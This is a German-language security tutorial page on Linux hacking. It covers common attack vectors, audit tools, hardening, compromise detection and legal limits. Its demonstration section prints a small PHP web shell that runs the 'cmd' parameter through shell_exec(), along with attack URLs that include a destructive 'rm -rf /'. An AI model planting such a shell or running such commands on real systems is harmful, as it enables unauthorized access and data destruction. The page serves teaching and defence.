Linux-Hacking-Tutorial: Ubuntu Befehle und Werkzeuge

⚡ Intelligente Zusammenfassung

Linux-Hacking ist die Praxis, Schwachstellen in Linux-Systemen zu finden und auszunutzen. Auf dieser Seite werden die Schwachstellen erläutert, die Angreifer anvisieren, die verwendeten Prüfwerkzeuge und die Kontrollmechanismen, die einen Server schützen.

  • 🐧 Warum es darauf ankommt: Linux ist die Basis der meisten Webserver und Cloud-Workloads und macht es daher zu einem attraktiven Ziel.
  • 🔍 Open-Source-Abwägung: Der öffentlich zugängliche Quellcode hilft den Entwicklern, schnell Patches bereitzustellen, und erleichtert Angreifern die Suche nach Schwachstellen.
  • 🧰 Prüfwerkzeuge: Nessus, Nmap, Lynis und OpenVAS Offene Ports, fehlende Patches und schwache Konfigurationen aufdecken.
  • 💥 Angriffsvektoren: Schwache SSH-Zugangsdaten, ungepatchte Kernel, Fehlkonfigurationen und Web-Shells sind die Hauptursachen für Sicherheitslücken.
  • 🛡️ Härten: Patch-Management, SSH-Härtung, das Prinzip der minimalen Berechtigungen und obligatorische Zugriffskontrollen reduzieren das Angriffsrisiko erheblich.
  • 🚨 Erkennung: Audit-Protokolle, Integritätsprüfungen von Dateien und Angriffserkennungssysteme decken Sicherheitslücken auf, bevor sich der Schaden ausbreiten kann.

Linux-Hacking-Tutorial

Linux ist das am weitesten verbreitete Serverbetriebssystem, insbesondere für Webserver. Es ist Open Source, das heißt, jeder kann den Quellcode lesen. Diese Transparenz hat Vor- und Nachteile: Entwickler nutzen sie, um Fehler schnell zu finden und zu beheben, während Angreifer denselben Code analysieren, um Schwachstellen auszunutzen. Linux-Hacking bezeichnet die Praxis, diese Schwachstellen auszunutzen, um sich unbefugten Zugriff auf ein System zu verschaffen.

Die folgenden Abschnitte behandeln, was Linux ist, welche Sicherheitslücken es betrifft und geben einen praktischen Einblick ins Hacking mit Ubuntuund die Gegenmaßnahmen, die Sie ergreifen können.

Kurzer Hinweis zu Linux

Linux ist ein Open-Source-Betriebssystem. Viele Distributionen basieren darauf, darunter Red Hat Enterprise LinuxFedora, Debian und UbuntuDa der Quellcode veröffentlicht ist, können Forscher, Anbieter und Angreifer ihn gleichermaßen einsehen. Angreifer nutzen diesen Zugriff, um nach ausnutzbaren Schwachstellen zu suchen, während die gleiche Transparenz es den Entwicklern ermöglicht, Fehlerbehebungen schneller bereitzustellen, als es bei geschlossenen Plattformen oft der Fall ist. Linux läuft als Betriebssystem auf Servern, Desktop-Computern, Tablets und Mobilgeräten.

Linux-Programme können über eine grafische Benutzeroberfläche oder die Kommandozeile bedient werden. Die Arbeit mit der Kommandozeile ist schneller und präziser als die Navigation durch eine grafische Oberfläche, weshalb Sicherheitstester, die mit Distributionen wie Linux arbeiten, diese bevorzugen. Kali Linux Sie verbringen fast ihre gesamte Zeit im Terminal. Die Kenntnis der grundlegenden Befehle ist daher eine praktische Voraussetzung.

Beziehen Sie sich darauf Linux-Tutorial für die Grundlagen und für die Kali Linux Lernprogramm für die darauf aufbauende, sicherheitsorientierte Distribution.

Häufige Sicherheitslücken und Angriffsvektoren unter Linux

Angriffe auf Linux basieren selten auf exotischen Sicherheitslücken. Telemetriedaten aus den Jahren 2025 und 2026 zeigen, dass die meisten Kompromittierungen auf … beruhen. tracKehren wir zu einer kleinen Anzahl wiederkehrender Schwächen zurück, und wenn wir diese kennen, wissen wir, wo wir unsere defensiven Anstrengungen zuerst konzentrieren sollten.

  • Schwache oder wiederverwendete SSH-Zugangsdaten — Brute-Force-Angriffe und Credential-Stuffing-Versuche gegen SSH-Zugangspunkte mit Internetzugang machen den Großteil der beobachteten feindseligen Aktivitäten auf Linux-Endpunkten aus.
  • Ungepatchte Kernel- und Paketfehler — Das Linux-Kernel-Team wurde 2024 zur CVE Numbering Authority ernannt, und die Anzahl der gemeldeten Kernel-CVEs stieg von etwa 290 im Jahr 2023 auf mehr als 3,500 im darauffolgenden Jahr, sodass sich schnell Patch-Rückstände aufbauen.
  • Fehlkonfiguration — Standardkonten, unnötige Daemons, für alle Benutzer beschreibbare Dateien und permissive sudo-Regeln verleihen Privilegien, für deren Erlangung kein Exploit erforderlich war.
  • Anfällige Webanwendungen — Mängel wie SQL-Injection Cross-Site-Scripting ermöglicht es Angreifern, den Server über die Anwendung anstatt über das Betriebssystem zu erreichen. Web-Shells sind die am häufigsten gefundene Schadsoftware auf kompromittierten Linux-Servern.
  • Fehler bei der Rechteausweitung – Lokale Sicherheitslücken, die ein eingeschränktes Benutzerkonto in ein Root-Konto verwandeln. Einige blieben über ein Jahrzehnt lang unentdeckt im Kernel, bevor sie aufgedeckt wurden.
  • Lieferketten- und Abhängigkeitsrisiko — Drittanbieterpakete, Sprachbibliotheken und Container-Images laden Code herunter, den niemand aus dem Betriebsteam geprüft hat.

Keiner dieser Angriffe erfordert, dass ein Angreifer Linux selbst kompromittiert. Analysen von 2025 Eindringversuchen ergaben, dass etwa vier von fünf gar keine Schadsoftware beinhalteten, sondern auf Fehlkonfigurationen und gestohlenen Zugangsdaten beruhten.

Linux-Hacking-Tools

Sicherheitstester und Systemadministratoren verwenden dieselben Scanner: Die einen suchen nach Schwachstellen, bevor Angreifer sie ausnutzen, die anderen überprüfen die Wirksamkeit der Korrekturen. Die folgenden Tools werden am häufigsten für die Überprüfung eines Linux-Hosts eingesetzt.

Werkzeug Typ Lizenz Typische Verwendung unter Linux
Nessus Scanner für Sicherheitslücken Gewerbliche Anwendungen Durchsucht Konfigurationseinstellungen, fehlende Patches und Netzwerkdienste in heterogenen Umgebungen.
Nmap Netzwerk- und Portscanner Open Source Identifiziert die auf einem Server laufenden Hosts, die von ihnen bereitgestellten Dienste und die geöffneten Ports.
Lynis Host-Auditierung und -Härtung Open Source Prüft ein laufendes System anhand von Härtungsstandards und meldet konkrete Korrekturmaßnahmen.
OpenVAS Scanner für Sicherheitslücken Open Source Netzwerk-Schwachstellenscan, der von Greenbone als Teil seiner Community Edition bereitgestellt wird.

Die Liste ist nicht vollständig; sie vermittelt einen Eindruck von den für die Prüfung verfügbaren Instrumenten. Ubuntu und anderen Linux-Systemen. Ältere Anleitungen empfehlen noch SARA, den Security Auditor's Research Assistant, aber dessen letzte Version stammt aus dem Jahr 2009 und die Projektwebsite ist offline, daher Lynis und OpenVAS sind die beibehaltenen Alternativen.

Hacking-Aktivität: Hack a Ubuntu Linux-System mit PHP

In diesem praktischen Szenario untersuchen wir, wie ein Linux-Host über eine Webanwendung erreicht werden kann, am Beispiel von PHP. Es wird kein lebendes Opfer angegriffen. Wenn Sie es ausprobieren möchten, installieren Sie LAMPP, die Linux-Version von XAMPP, auf Ihrem Rechner.

PHP Es enthält zwei Funktionen zum Ausführen von Betriebssystembefehlen: exec() und shell_exec(). Die Funktion exec() gibt die letzte Zeile der Befehlsausgabe zurück, während shell_exec() das gesamte Ergebnis des Befehls als Zeichenkette zurückgibt.

Nehmen wir zur Veranschaulichung an, ein Angreifer schafft es, die folgende Datei auf einen Webserver hochzuladen.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HIER,

Das obige Skript liest den Befehl aus der GET-Variablen namens cmd. Der Befehl wird mit shell_exec() ausgeführt und das Ergebnis im Browser angezeigt.

Der obige Code kann mithilfe der folgenden Methoden ausgenutzt werden: URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HIER,

  • “…konsole.php?cmd=ls%20-l” weist der Variablen cmd den Wert ls -l zu.

Der Befehl auf dem Ubuntu Der Server wird daher wie folgt ausgeführt:

shell_exec('ls -l') ;

Die Ausführung des obigen Codes auf einem Webserver führt zu einem Ergebnis, das in etwa dem folgenden entspricht.

Browserausgabe eines PHP-Skripts, das Verzeichnisinhalte und Dateiberechtigungen auflistet Ubuntu Server

Die Ausgabe zeigt lediglich die Dateien im aktuellen Verzeichnis und deren Berechtigungen an.

Nehmen wir nun an, der Angreifer übergibt stattdessen den folgenden Befehl.

rm -rf /

HIER,

  • „rm“ löscht Dateien.
  • „rf“ bewirkt, dass der Befehl rm rekursiv ausgeführt wird und somit alle Ordner und Dateien gelöscht werden.
  • “/” weist den Befehl an, mit dem Löschen im Stammverzeichnis zu beginnen.

Der Angriff URL würde ungefähr so ​​aussehen

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Ein einziger nicht validierter Parameter genügt daher, um einem Angreifer sämtliche Berechtigungen des Webserver-Kontos zu verleihen. Die beiden folgenden Abschnitte dienen dazu, dies zu verhindern und Fehler abzufangen, wenn die Präventionsmaßnahmen fehlschlagen.

Wie man Linux-Hacks verhindert

Linux-Hacking nutzt Schwachstellen im Betriebssystem und in der darauf laufenden Software aus. Eine Organisation kann die folgenden, gemeinsam angewandten Maßnahmen ergreifen, um die meisten der oben beschriebenen Sicherheitslücken zu schließen.

  • Patch-Management Patches beheben die Sicherheitslücken, die Angreifer ausnutzen, um ein System zu kompromittieren. Eine festgelegte Richtlinie stellt sicher, dass relevante Updates umgehend und nicht nur dann eingespielt werden, wenn sich jemand daran erinnert.
  • Richtige Betriebssystemkonfiguration — Inaktive Benutzerkonten und unnötige Dienste deaktivieren. Standardeinstellungen ändern, einschließlich Standardbenutzernamen, Passwörter für gemeinsam genutzte Anwendungen und Standardportnummern.
  • SSH-Härtung — Deaktivieren Sie die Anmeldung und Passwortauthentifizierung für den Root-Benutzer, erlauben Sie nur benannte Benutzer oder Gruppen und begrenzen Sie die Anzahl der Authentifizierungsversuche. Dadurch wird der am häufigsten angegriffene Sicherheitsvorkehrungspunkt unter Linux geschlossen.
  • Geringstes Privileg — Konten und Diensten sollten nur die Rechte gegeben werden, die sie benötigen, und sudo sollte auf bestimmte Befehle beschränkt werden, anstatt einen umfassenden administrativen Zugriff zu gewähren.
  • Obligatorische Zugriffskontrolle — SELinux (Red Hat-Familie) oder AppArmor (Debian und Ubuntu) im Erzwingungsmodus, sodass ein kompromittierter Dienst den Rest des Systems nicht erreichen kann.
  • Eingabevalidierung — Die obige Demonstration funktioniert nur, weil die Anfragedaten eine Shell-Funktion erreichen. Übergeben Sie niemals Benutzereingaben an exec() oder shell_exec().
  • Firewalls und Segmentierung — nur die Ports freigeben, die ein Dienst tatsächlich benötigt, mithilfe eines Firewall und Netzwerksegmentierung, um die Reichweite eines kompromittierten Hosts einzuschränken.
  • Einbrucherkennungssystem — Solche Tools können dazu verwendet werden, unbefugten Zugriff auf das System zu erkennen, und einige können den Zugriffsversuch auch blockieren.
  • Getestete Backups — Offline wiederherstellbare Backups machen aus einem destruktiven Befehl wie dem oben genannten eher einen vorübergehenden Ausfall als einen dauerhaften Datenverlust.

Wie man ein kompromittiertes Linux-System erkennt

Prävention scheitert irgendwann, daher ist die zweite Frage, wie schnell man es bemerken würde. Die Erkennung unter Linux hängt davon ab, die richtigen Beweise vor einem Vorfall zu sammeln, nicht erst danach.

  • Audit-Protokollierung Das Kernel-Audit-Framework auditd protokolliert die Nutzung von Berechtigungen, Dateizugriffe und Systemaufrufe in einer Form, die ein kompromittierter Prozess nicht unbemerkt überschreiben kann. Diese Protokolle werden vom Host an einen zentralen Sammler weitergeleitet.
  • Authentifizierungsprotokolle — eine Reihe von Fehlschlägen, gefolgt von einem einzelnen Erfolg in /var/log/auth.log oder /var/log/secure, ist die klassische Brute-Force-Signatur.
  • Unerwartete Prozesse und Verbindungen — Ein Abhördienst oder eine ausgehende Verbindung, für die niemand eine Erklärung hat, muss sofort untersucht werden.
  • Überwachung der Dateiintegrität — Tools, die Systembinärdateien und Konfigurationsdateien hashen, kennzeichnen Änderungen an Dateien, die sich niemals ändern sollten.
  • Geplante Aufgaben und Startelemente — Persistenz findet üblicherweise in Cronjobs, Systemd-Units oder Shell-Profilskripten statt.
  • Neue oder geänderte Konten — Achten Sie auf unbekannte Benutzer, alle zweiten Accounts mit UID 0 und SSH-Schlüssel, die niemand hinzugefügt hat.
  • Webserver-Verzeichnisse Da Web-Shells die am häufigsten auf Linux-Servern gefundenen Schadprogramme sind, verdienen unerwartete Skriptdateien unter einem Web-Root besondere Aufmerksamkeit.
  • Geplante Audits — Führen Sie ein Host-Audit-Tool wie Lynis regelmäßig aus und behandeln Sie jeden Bericht als Arbeitsliste und nicht als einmalige Aufgabe.

Sollten Sie Anzeichen einer Kompromittierung finden, isolieren Sie den Host, sichern Sie die Protokolle und ein Festplattenabbild, bevor Sie Änderungen vornehmen, und stellen Sie das System von bekannten, fehlerfreien Medien wieder her, anstatt ein laufendes System zu bereinigen. Die Beweissicherung wird in [Referenz einfügen] behandelt. digitale Forensik.

Rechtliche und ethische Grenzen des Linux-Hackings

Alle auf dieser Seite beschriebenen Techniken dürfen auf Systemen, die Ihnen gehören oder für die Sie eine schriftliche Genehmigung zum Testen haben, rechtmäßig angewendet werden; andernorts sind sie jedoch fast überall unzulässig. Die obige Übung wird aus genau diesem Grund absichtlich auf einer lokalen Installation durchgeführt.

  • Schriftliche Genehmigung – Ein unterzeichneter Testumfang, ein vereinbarter Testzeitraum und ein benannter Ansprechpartner unterscheiden einen Penetrationstest von einer Straftat. Eine mündliche Zustimmung genügt nicht.
  • Bleiben Sie im Rahmen — Hosts, Adressbereiche und Techniken, die nicht aufgeführt sind, sind nicht zulässig, auch wenn sie erreichbar sind.
  • Daten sorgfältig behandeln — Beweismittel, die während eines Tests gesammelt wurden, enthalten immer noch reale personenbezogene Daten und müssen sicher aufbewahrt und anschließend vernichtet werden.
  • Verantwortungsvoll melden — die Ergebnisse dem Eigentümer mitzuteilen und Zeit für eine Behebung des Problems einzuräumen, bevor etwas veröffentlicht wird.

Das rechtliche Risiko ist real: Unbefugter Zugriff auf ein Computersystem ist eine Straftat, beispielsweise nach dem US-amerikanischen Computer Fraud and Abuse Act und dem britischen Computer Misuse Act. Wer in diesem Bereich Karriere machen möchte, sollte einen anerkannten Weg einschlagen – eine Ausbildung zum Computerfachmann oder eine vergleichbare Qualifikation. Sicherheitszertifizierung und dazu noch ein eigenes Labor, anstatt den Server von jemand anderem.

Häufig gestellte Fragen

Linux profitiert von der strikten Trennung der Benutzer und der geringeren Angriffsfläche auf Desktop-Systemen, wodurch es deutlich seltener von gängiger Malware betroffen ist. Anders sieht es bei Servern aus: Linux-Hosts mit Internetzugang sind ständig Angriffen ausgesetzt, und die Qualität der Konfiguration entscheidet über den Erfolg.

Signaturprüfung ist hilfreich auf Datei- und Mailservern, die Inhalte für andere Plattformen verarbeiten. Für die meisten Linux-Systeme sind Patches, Systemhärtung und protokollbasierte Erkennung jedoch sinnvoller, da die meisten Angriffe gar keine Schadsoftware beinhalten.

Maschinelle Lernmodelle analysieren das normale Prozess-, Anmelde- und Netzwerkverhalten eines Hosts und erkennen Abweichungen, die von festen Regeln übersehen werden – beispielsweise wenn ein Webserver-Konto eine Shell startet. Angreifer nutzen dieselben Techniken, um ihre Aufklärung zu beschleunigen, sodass beide Seiten in Bewegung bleiben.

GitHub-Copilot Es kann parametrisierte Abfragen und sicherere Alternativen zu Shell-Aufrufen vorschlagen, wenn es direkt danach gefragt wird. Es wird mit öffentlichem Code trainiert, daher müssen die Vorschläge noch überprüft werden – betrachten Sie es als ersten Entwurfsassistenten, nicht als Sicherheitsscanner.

Beide basieren auf Debian, aber Kali Linux Es enthält Hunderte vorinstallierter Sicherheits- und Forensik-Tools und ist für Testarbeiten konzipiert. Ubuntu ist eine universelle Desktop- und Serverdistribution und eignet sich besser für den täglichen Gebrauch.

Installieren Sie Sicherheitsupdates mindestens monatlich und innerhalb weniger Tage für kritische oder bekanntermaßen angreifbare Sicherheitslücken. Aktivieren Sie automatische Sicherheitsupdates und planen Sie Neustarts, damit Kernelkorrekturen wirksam werden.

Beginnen Sie mit einer Linux-Administrationszertifizierung wie LPIC oder RHCSA, ergänzen Sie diese durch CompTIA Security+ und steigen Sie dann in die praktische Penetrationstestung oder das Management ein. track. Guru99 führt eine Liste von Cyber-Sicherheitszertifizierungen mit den aktuellen Anforderungen.

Nutzen Sie eine virtuelle Maschine auf Ihrer eigenen Hardware oder eine zugelassene Trainingsplattform wie z. B. Versuchen Sie HackMeDie Zielsysteme sind genau für diesen Zweck vorgesehen. Testen Sie niemals ein System, das Ihnen nicht gehört, ohne schriftliche Genehmigung.

Fassen Sie diesen Beitrag mit folgenden Worten zusammen: